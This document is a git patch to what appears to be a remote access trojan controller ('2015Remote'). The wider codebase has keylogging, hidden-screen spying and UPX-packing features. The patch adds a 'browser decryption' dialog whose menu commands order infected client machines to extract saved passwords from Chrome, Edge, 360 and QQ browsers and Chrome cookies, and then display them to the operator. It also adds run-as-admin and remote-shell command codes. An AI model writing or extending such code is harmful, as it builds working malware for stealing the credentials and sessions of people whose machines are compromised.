From a6d2e5551d03ecd11f4792bcc3a5b471681402a8 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Mon, 9 Jun 2025 14:25:37 +0800
Subject: [PATCH] Plugin: Add browser decryption feature

---
 common/commands.h                           |   4 +
 server/2015Remote/2015Remote.rc             | Bin 76782 -> 79010 bytes
 server/2015Remote/2015RemoteDlg.cpp         |  32 ++++++
 server/2015Remote/2015RemoteDlg.h           |   1 +
 server/2015Remote/2015Remote_vs2015.vcxproj |   3 +
 server/2015Remote/DecryptDlg.cpp            | 117 ++++++++++++++++++++
 server/2015Remote/DecryptDlg.h              |  34 ++++++
 server/2015Remote/res/decrypt.ico           | Bin 0 -> 766 bytes
 server/2015Remote/resource.h                | Bin 36546 -> 37970 bytes
 server/2015Remote/stdafx.h                  |   2 +
 10 files changed, 193 insertions(+)
 create mode 100644 server/2015Remote/DecryptDlg.cpp
 create mode 100644 server/2015Remote/DecryptDlg.h
 create mode 100644 server/2015Remote/res/decrypt.ico

diff --git a/common/commands.h b/common/commands.h
index 475f71a..847148c 100644
--- a/common/commands.h
+++ b/common/commands.h
@@ -220,8 +220,12 @@ enum
 
 	SOCKET_DLLLOADER=210,           // 客户端请求DLL
 	CMD_DLLDATA,                    // 响应DLL数据
+	CMD_RUNASADMIN=214,             // ADMIN 运行
 	CMD_MASTERSETTING = 215,		// 主控设置
 	CMD_HEARTBEAT_ACK = 216,		// 心跳回应
+	CMD_SERVER_ADDR = 229,          // 主控地址
+	TOKEN_ERROR = 230,              // 错误提示
+	TOKEN_SHELL_DATA = 231,         // 终端结果
 	CMD_EXECUTE_DLL = 240,			// 执行代码
 };
 
diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index 3b68806af38383b2befcde6ae233c791b0a1c544..883f3f18bf96e80c526720b3254ea0dd2a2631cf 100644
GIT binary patch
delta 986
zcmZXST}V@57{{N*inXcCkJD(9n`bDSEj#;a&70J-p|QD7wZve>HfDrwBm~_=)=h&V
z>A^5H(CRWuSWw+WBZ%lO61oVgAr#)of-bs<=y}iF+)li_ob#UZ{NDfn`M>Y>C*^}J
z<@#R^=e2G7eIP;<CLoNq1c&|FK1~u*kbsMD8M65;Zs8iPzEoot?Oi@N1tSoHA+Um*
zrj3S^o^~3?>FEFuSh2V`fkI4$PYgVsxz~VElim;nuT<xxnli`g-Ndt%3yb1W)yFIG
z^rN8aCI(IVgFcWW4oSj|YqvR^8M5Q}l2*q|uvsx+1A(o{!T_#ba*~Zc>|IvjAFsOE
zCh=v%K?uPpM!HS7E%LaytUr8`42lqk0R0icFYW1+?3Fc`ZHJ^ah?#`$&WaMhi#_hm
zT=K4BVQG@5-<2)K$ol`=I3?I!?jIGNL)hQZr18RT{E-e5uFR_UI^Y;3Qt*%9;~Ot@
zo4L1>+0;yehel9S`Yf0+Fyh+h*2Wr|+UY!z!cxHOs{2YUMTv<K6M#{2DeO!ay|MHq
zwQ6L8`0e3(-g^Huk5`}awf6FJudaJA{HsN#S|~a+%%d5)DMAYtUk|j2Fh$oV1JiVo
zj1ZcBmzx?#;f)!MU-q@j?TIi<7DKEx{P5nQ^+6KS^`OATY42)M)JL3FUi|s>NDK2X
zkjh-zFke;bVM+!$5`!>d1WHW{Os%Pc@1UiPUWRgVR4QXYLj)qbJ(V^DR^BQvry^F|
zULS-=k!0WkoTu()(N^eWtVPb&<UuzvM8i*4i;fT@Kf0vjdG>n`k7tJu)E>|Cb9%+C
F=6@Ue^GN^z

delta 457
zcmZ4VlI7iXmJR<zH+P9OG))$o>7cB@V9ub!puk`VgeG8?5rYwf1(;>bU<slpUo3T;
z{6LLuvR}E-WFZHo$?s<JFe*&Gt1PYU$KV3hW5QqzW`WFs=r#wkASRnK@G@{s4s28A
zy<8WczQm8CM+t0h?kss#1)yyRy~Y@Njlg<0&T>|SxfJ4Fgewgh3?P00y3>8~g!u-O
zP0|f?Ll`_60>Jh|)WdYaTnF>5AA>(b$mEY<(vySQlqM_9kup~R>U3dnW{79-0m?Zu
zc!Ny=xf0?Zn0XNY8bia+X>#sNab~DLC$E{qV~j8-l)(>&Std~3=8({v{BVx=WP{}!
iHrFhOP@25qIoD>sBV`sKk*%K?nUp|`?NTa?9RdJW++8&Q

diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index d635803..bbaa92c 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -34,6 +34,7 @@
 #include "HideScreenSpyDlg.h"
 #include <sys/MachineDlg.h>
 #include "Chat.h"
+#include "DecryptDlg.h"
 
 #ifdef _DEBUG
 #define new DEBUG_NEW
@@ -356,6 +357,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
 	ON_MESSAGE(WM_OPENHIDESCREENDLG, OnOpenHideScreenDialog)
 	ON_MESSAGE(WM_OPENMACHINEMGRDLG, OnOpenMachineManagerDialog)
 	ON_MESSAGE(WM_OPENCHATDIALOG, OnOpenChatDialog)
+	ON_MESSAGE(WM_OPENDECRYPTDIALOG, OnOpenDecryptDialog)
 	ON_MESSAGE(WM_UPXTASKRESULT, UPXProcResult)
 	ON_WM_HELPINFO()
 	ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare)
@@ -1574,6 +1576,11 @@ VOID CALLBACK CMy2015RemoteDlg::NotifyProc(CONTEXT_OBJECT* ContextObject)
 		Dlg->OnReceiveComplete();
 		break;
 	}
+	case DECRYPT_DLG: {
+		DecryptDlg* Dlg = (DecryptDlg*)ContextObject->hDlg;
+		Dlg->OnReceiveComplete();
+		break;
+	}
 	default: {
 		HANDLE hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
 		if (hEvent == NULL) {
@@ -1676,6 +1683,10 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
 		g_2015RemoteDlg->SendMessage(WM_OPENCHATDIALOG, 0, (LPARAM)ContextObject);
 		break;
 	}
+	case TOKEN_DECRYPT: { // 瑙ｅ瘑鏁版嵁
+		g_2015RemoteDlg->SendMessage(WM_OPENDECRYPTDIALOG, 0, (LPARAM)ContextObject);
+		break;
+	}
 	case TOKEN_KEYBOARD_START: {// 閿洏璁板綍
 			g_2015RemoteDlg->SendMessage(WM_OPENKEYBOARDDIALOG, 0, (LPARAM)ContextObject);
 			break;
@@ -1905,6 +1916,12 @@ LRESULT CMy2015RemoteDlg::OnUserOfflineMsg(WPARAM wParam, LPARAM lParam)
 			delete Dlg;
 			break;
 		}
+		case DECRYPT_DLG:
+		{
+			DecryptDlg* Dlg = (DecryptDlg*)p->hDlg;
+			delete Dlg;
+			break;
+		}
 		default:break;
 		}
 		delete p;
@@ -2214,6 +2231,21 @@ LRESULT CMy2015RemoteDlg::OnOpenChatDialog(WPARAM wParam, LPARAM lParam)
 	return 0;
 }
 
+LRESULT CMy2015RemoteDlg::OnOpenDecryptDialog(WPARAM wParam, LPARAM lParam)
+{
+	CONTEXT_OBJECT* ContextObject = (CONTEXT_OBJECT*)lParam;
+
+	DecryptDlg* Dlg = new DecryptDlg(this, m_iocpServer, ContextObject);
+
+	Dlg->Create(IDD_DIALOG_DECRYPT, GetDesktopWindow());
+	Dlg->ShowWindow(SW_SHOW);
+
+	ContextObject->v1 = DECRYPT_DLG;
+	ContextObject->hDlg = Dlg;
+
+	return 0;
+}
+
 BOOL CMy2015RemoteDlg::OnHelpInfo(HELPINFO* pHelpInfo)
 {
 	MessageBox("Copyleft (c) FTU 2025", "鍏充簬");
diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h
index 89161b0..a73e336 100644
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -226,6 +226,7 @@ public:
 	afx_msg LRESULT OnOpenMachineManagerDialog(WPARAM wParam, LPARAM lParam);
 	afx_msg LRESULT OnOpenProxyDialog(WPARAM wParam, LPARAM lParam);
 	afx_msg LRESULT OnOpenChatDialog(WPARAM wParam, LPARAM lParam);
+	afx_msg LRESULT OnOpenDecryptDialog(WPARAM wParam, LPARAM lParam);
 	afx_msg LRESULT UPXProcResult(WPARAM wParam, LPARAM lParam);
 	afx_msg BOOL OnHelpInfo(HELPINFO* pHelpInfo);
 	virtual BOOL PreTranslateMessage(MSG* pMsg);
diff --git a/server/2015Remote/2015Remote_vs2015.vcxproj b/server/2015Remote/2015Remote_vs2015.vcxproj
index 0f1f0a4..15ac284 100644
--- a/server/2015Remote/2015Remote_vs2015.vcxproj
+++ b/server/2015Remote/2015Remote_vs2015.vcxproj
@@ -260,6 +260,7 @@
     <ClInclude Include="CpuUseage.h" />
     <ClInclude Include="CTextDlg.h" />
     <ClInclude Include="DateVerify.h" />
+    <ClInclude Include="DecryptDlg.h" />
     <ClInclude Include="EditDialog.h" />
     <ClInclude Include="FileManagerDlg.h" />
     <ClInclude Include="FileTransferModeDlg.h" />
@@ -312,6 +313,7 @@
     <ClCompile Include="CPasswordDlg.cpp" />
     <ClCompile Include="CpuUseage.cpp" />
     <ClCompile Include="CTextDlg.cpp" />
+    <ClCompile Include="DecryptDlg.cpp" />
     <ClCompile Include="EditDialog.cpp" />
     <ClCompile Include="FileManagerDlg.cpp" />
     <ClCompile Include="FileTransferModeDlg.cpp" />
@@ -368,6 +370,7 @@
     <Image Include="res\Bitmap_4.bmp" />
     <Image Include="res\Bitmap_5.bmp" />
     <Image Include="res\chat.ico" />
+    <Image Include="res\decrypt.ico" />
     <Image Include="res\delete.bmp" />
     <Image Include="res\icon2.ico" />
     <Image Include="res\keyboard.ico" />
diff --git a/server/2015Remote/DecryptDlg.cpp b/server/2015Remote/DecryptDlg.cpp
new file mode 100644
index 0000000..739d2a0
--- /dev/null
+++ b/server/2015Remote/DecryptDlg.cpp
@@ -0,0 +1,117 @@
+#include "stdafx.h"
+#include "DecryptDlg.h"
+
+
+IMPLEMENT_DYNAMIC(DecryptDlg, CDialog)
+
+DecryptDlg::DecryptDlg(CWnd* pParent, IOCPServer* IOCPServer, CONTEXT_OBJECT* ContextObject)
+	: CDialogBase(DecryptDlg::IDD, pParent, IOCPServer, ContextObject, IDI_ICON_DECRYPT) {
+}
+
+DecryptDlg::~DecryptDlg() {
+}
+
+void DecryptDlg::DoDataExchange(CDataExchange* pDX) {
+	CDialog::DoDataExchange(pDX);
+	DDX_Control(pDX, IDC_DECRYPT_RESULT, m_EditDecrypedResult);
+}
+
+
+BEGIN_MESSAGE_MAP(DecryptDlg, CDialog)
+	ON_WM_CLOSE()
+	ON_WM_SIZE()
+	ON_COMMAND(ID_DECRYPT_CHROME, &DecryptDlg::OnDecryptChrome)
+	ON_COMMAND(ID_DECRYPT_EDGE, &DecryptDlg::OnDecryptEdge)
+	ON_COMMAND(ID_DECRYPT_SPEED360, &DecryptDlg::OnDecryptSpeed360)
+	ON_COMMAND(ID_DECRYPT_360, &DecryptDlg::OnDecrypt360)
+	ON_COMMAND(ID_DECRYPT_QQ, &DecryptDlg::OnDecryptQQ)
+	ON_COMMAND(ID_DECRYPT_CHROMECOOKIES, &DecryptDlg::OnDecryptChromeCookies)
+END_MESSAGE_MAP()
+
+
+// DecryptDlg 消息处理程序
+
+
+BOOL DecryptDlg::OnInitDialog() {
+	CDialog::OnInitDialog();
+	SetIcon(m_hIcon, FALSE);
+
+	CString str;
+	str.Format("%s - 解密数据", m_IPAddress);
+	SetWindowText(str);
+
+	BYTE bToken = COMMAND_NEXT;
+	m_iocpServer->Send2Client(m_ContextObject, &bToken, sizeof(BYTE));
+	m_EditDecrypedResult.SetWindowTextA(CString("<<< 提示: 请在菜单选择解密类型 >>>\r\n"));
+	int m_nCurSel = m_EditDecrypedResult.GetWindowTextLengthA();
+	m_EditDecrypedResult.SetSel((int)m_nCurSel, (int)m_nCurSel);
+	m_EditDecrypedResult.PostMessage(EM_SETSEL, m_nCurSel, m_nCurSel);
+
+	return TRUE;
+}
+
+
+VOID DecryptDlg::OnReceiveComplete() {
+	if (m_ContextObject == NULL) {
+		return;
+	}
+	auto result = m_ContextObject->GetBuffer(1);
+	m_EditDecrypedResult.SetWindowTextA(CString(result));
+}
+
+void DecryptDlg::OnClose() {
+	m_ContextObject->CancelIO();
+
+	CDialogBase::OnClose();
+}
+
+void DecryptDlg::OnSize(UINT nType, int cx, int cy)
+{
+	CDialogBase::OnSize(nType, cx, cy);
+	if (m_EditDecrypedResult.GetSafeHwnd())
+	{
+		m_EditDecrypedResult.MoveWindow(0, 0, cx, cy); // 占满整个对话框
+	}
+}
+
+
+void DecryptDlg::OnDecryptChrome()
+{
+	BYTE	bToken[32] = { COMMAND_LLQ_GetChromePassWord };
+	m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptEdge()
+{
+	BYTE	bToken[32] = { COMMAND_LLQ_GetEdgePassWord };
+	m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptSpeed360()
+{
+	BYTE	bToken[32] = { COMMAND_LLQ_GetSpeed360PassWord };
+	m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecrypt360()
+{
+	BYTE	bToken[32] = { COMMAND_LLQ_Get360sePassWord };
+	m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptQQ()
+{
+	BYTE	bToken[32] = { COMMAND_LLQ_GetQQBroPassWord };
+	m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
+
+
+void DecryptDlg::OnDecryptChromeCookies()
+{
+	BYTE	bToken[32] = { COMMAND_LLQ_GetChromeCookies };
+	m_iocpServer->Send2Client(m_ContextObject, bToken, sizeof(bToken));
+}
diff --git a/server/2015Remote/DecryptDlg.h b/server/2015Remote/DecryptDlg.h
new file mode 100644
index 0000000..f1d48ef
--- /dev/null
+++ b/server/2015Remote/DecryptDlg.h
@@ -0,0 +1,34 @@
+#pragma once
+
+#include "IOCPServer.h"
+#include "Resource.h"
+
+class DecryptDlg : public CDialogBase
+{
+	DECLARE_DYNAMIC(DecryptDlg)
+
+public:
+	DecryptDlg(CWnd* pParent = NULL, IOCPServer* IOCPServer = NULL, CONTEXT_OBJECT* ContextObject = NULL);
+	virtual ~DecryptDlg();
+
+	VOID OnReceiveComplete();
+
+// 对话框数据
+	enum { IDD = IDD_DIALOG_DECRYPT };
+
+protected:
+	virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV 支持
+
+	DECLARE_MESSAGE_MAP()
+public:
+	virtual BOOL OnInitDialog();
+	afx_msg void OnClose();
+	afx_msg void OnSize(UINT nType, int cx, int cy);
+	afx_msg void OnDecryptChrome();
+	afx_msg void OnDecryptEdge();
+	afx_msg void OnDecryptSpeed360();
+	afx_msg void OnDecrypt360();
+	afx_msg void OnDecryptQQ();
+	afx_msg void OnDecryptChromeCookies();
+	CEdit m_EditDecrypedResult;
+};
diff --git a/server/2015Remote/res/decrypt.ico b/server/2015Remote/res/decrypt.ico
new file mode 100644
index 0000000000000000000000000000000000000000..de2dbbe1c6bf8099bcd8e5fe504b73cc64c488dd
GIT binary patch
literal 766
zcmZvau};G<5QeV=DV92<6JzPf7%51tlp%c>9>7uuTk4RLI>eh_1&M*71KC)3h_bQK
z%|!y4-wq`y^ml&Scc0HmoDhxBX0r(qUDDeH(G_Ml@C;tUBjke^?7SEdgt;5gV@hq?
zVhq5?i@Xmr7%ikicTVYPQYbl0NTFrXX@PvBNXTs`og;2YALA8=1y)NHwGKROQ2(<Y
zT(}1H1CDw#;Q#7H*zcqs`}OtMPiXErp2ybQb83uJYTPY|_qWQquHXsJXSJ(qr869k
zcPkc7J8&%)QMpwIS5vK%&1S>NhON?0a;gb<o-ZPo1~Cq3o)=`5u!<Dp#c7TXvGHDv
zkFjtvHAa-jn5=g=v_2Nbuo%Sn%4p?^D0vJ;ox(gt?pNhQvF<Szm)rYa7$!*(v46*V
zK70SglpL5w`z6sH_yC7-_csnXIIzeuwlKp{6a22&ov6x!8E$W@Y<E{>A1~AFb4u6v
M?JDoN_Wsp>16>Z_C;$Ke

literal 0
HcmV?d00001

diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h
index 4223baff3560e3823b073c4e2eccd82e9ac2b70b..c965cd0f3e2aa98c9ad4d6b2cddbc7e6deabab2d 100644
GIT binary patch
delta 502
zcmZWlPfG%E5S`sskwwH1Q`%PDG)3{xu4a0P6kYlwWo8i3f*5^)4nfBb(IF7h2c0VF
z)-mV{Sl^(|5qatErEC3GyQIuzc=P7HH}i7Czdi7e-)X$(Bi)n*b1pwlCDFP`I_;v9
zjhWzrTELalFJveWEf+v9;>5Ko;>!pQv7=a0&}kEWBZ?0-fp9S)1StdMLdIj=hLq;O
zp)bMZ@fr$1O*^<82Bjp<+rF-2TBwkYpQR|y+B3MUif*0Cv`u@oMLX1FolXrX`}1s_
zQzU%yHWURL4$5)#X6+`b2f9}APbOw%&MfEsne1i4|D?*a%H(Po@S$OD#U**0G|ti)
zvVxX>p39(fEGv_Y28*V%s!)~|NkuCza|QHIWY4(PXkMC&b`8IKd|0PCO6eF|o#LhF
zq|IMk+8CZuqZ(Cd4Fji#g)iWFJ%BsW&Sjw#HPhZAA?S2*<}XK27-6S&%aftS4Mr&~
Kd!KIGVeS`t*?VgM

delta 119
zcmcb#g6Ys)rVZcp8I2~(3n)%*kmj1~VZg_1#9%ggqq{ta&+E+K!QjXc!r;T;&)`1!
ztbr|1)_iiIrY@^1gCB#-<VHh~?v4GjlO4j@`2E1@oEf|s6c|A29<oSJZs1_q{KiZx
OX7W2DiOqVGRTu%`2q7#0

diff --git a/server/2015Remote/stdafx.h b/server/2015Remote/stdafx.h
index 7db9afa..54322ca 100644
--- a/server/2015Remote/stdafx.h
+++ b/server/2015Remote/stdafx.h
@@ -81,6 +81,7 @@
 #define WM_OPENHIDESCREENDLG			WM_USER+3015
 #define WM_OPENMACHINEMGRDLG			WM_USER+3016
 #define WM_OPENCHATDIALOG				WM_USER+3017
+#define WM_OPENDECRYPTDIALOG			WM_USER+3018
 
 enum
 {
@@ -99,6 +100,7 @@ enum
 	HIDESCREEN_DLG,
 	MACHINE_DLG,
 	CHAT_DLG,
+	DECRYPT_DLG,
 };